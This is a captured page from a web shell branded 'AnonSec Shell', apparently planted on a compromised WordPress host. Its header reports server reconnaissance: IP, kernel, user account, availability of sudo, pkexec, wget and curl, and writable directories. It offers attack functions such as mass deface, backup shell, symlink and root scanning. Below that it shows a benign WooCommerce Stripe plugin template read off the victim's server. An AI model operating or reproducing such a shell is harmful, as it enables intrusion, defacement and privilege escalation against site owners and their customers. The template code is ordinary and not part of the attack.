AnonSec Shell
Server IP : 144.76.79.100  /  Your IP : 216.73.216.103   [ Reverse IP ]
Web Server : Apache
System : Linux ch05.wehostwebserver.com 5.14.0-611.5.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 08:09:09 EST 2025 x86_64
User : razzlestore ( 1092)
PHP Version : 8.2.29
Disable Function : NONE
Domains : 343 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/razzlestore/public_html/wp-content/plugins/woo-stripe-payment/templates/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/razzlestore/public_html/wp-content/plugins/woo-stripe-payment/templates/installment-plans.php
<?php

/**
 * @var null|array $installments
 * @version 3.3.19
 */
if ( is_null( $installments ) ) {
	$installments = array( 'none' => array( 'text' => esc_html__( 'Fill out card form for eligibility.', 'woo-stripe-payment' ) ) );
}
?>
<div class="wc-stripe-installment-container">
    <label class="installment-label">
		<?php esc_html_e( 'Pay in installments:', 'woo-stripe-payment' ); ?>
        <div class="wc-stripe-installment-loader__container">
            <div class="wc-stripe-installment-loader" style="display: none">
                <div></div>
                <div></div>
                <div></div>
            </div>
        </div>
    </label>
	<?php woocommerce_form_field( WC_Stripe_Constants::INSTALLMENT_PLAN, array(
		'id'          => WC_Stripe_Constants::INSTALLMENT_PLAN,
		'type'        => 'select',
		'options'     => wp_list_pluck( $installments, 'text' ),
		'class'       => array( 'wc-stripe-installment-options' ),
		'input_class' => array( 'input-text' )
	), array_keys( $installments )[0] ) ?>
</div>

Anon7 - 2022
AnonSec Team